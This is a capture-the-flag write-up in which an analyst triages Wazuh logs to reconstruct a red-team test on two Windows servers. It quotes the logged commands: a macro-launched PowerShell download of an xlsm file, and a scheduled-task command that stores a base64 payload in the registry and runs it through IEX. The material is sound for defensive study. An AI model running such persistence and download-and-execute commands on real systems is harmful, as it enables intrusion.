This room simulates a situation where I’m a security analyst trying to triage the security test from the logs centralized on Wazuh. The goal is to find out what the red team did to compromise SwiftSpend. The logs were collected from 2 endpoints. The test ran between April 29, 2024 12:00 to 20:00
| Windows_SwiftSpend | 10.10.157.254 | Win server 2019 data center |
|---|---|---|
| Windows_SwiftSpend2 | 10.10.205.57 | Win server 2019 data center |
Security Event filtered by the saved Monday_Monitor query.
Initial access was established using a downloaded file. What is the file name saved on the host?
The first question hints about initial access came from a downloaded file. This file could be downloaded via a browser or Invoke-WebRequest command.
! Go to Events and filter the string http and Invoke-WebRequest
Querying for records that contain the string http yields 3 results.
The earliest one is from 13:45:31.277 in which the following command line was executed in a Windows Shell from an Office product.
\\"powershell.exe\\" & {$url = '<http://localhost/SwiftSpend_Financial_Expenses.xlsm>' Invoke-WebRequest -Uri $url -OutFile $env:TEMP\\\\PhishingAttachment.xlsm}
! This command came from a VBA macro in PhishingAttachment.xlsm .
<aside> 💡
Q1: The file it tried to download was SwiftSpend_Financial_Expenses.xlsm .
</aside>
What is the full command run to create a scheduled task?
Now that I know the test start around 13:45. I can narrow down the search.
To look for sign of a scheduled task, I query for eventID 13 (RegKey value set), 14 (Registry value or key rename), the string Schedule , and schtasks.exe . The search focuses around the time after 13:55 when the second stage file SwiftSpend_Financial_Expenses.xlsm was downloaded.
MITRE document about Scheduled Task technique: https://attack.mitre.org/techniques/T1053/005/
Detection rules highlight 2 events as being started by Macro.
<aside> 💡
Q2: Answer in the event at 14:00:30.986
\\"cmd.exe\\" /c \\"reg add HKCU\\\\SOFTWARE\\\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F /TN \\"ATOMIC-T1053.005\\" /TR \\"cmd /c start /min \\\\\\"\\\\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\\\\\SOFTWARE\\\\\\\\ATOMIC-T1053.005).test)))\\" /sc daily /st 12:34\\"
</aside>
This command create a new registry key that contain a payload encoded in base64, the payload is as follow:
cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= : ping www.youarevulnerable.thm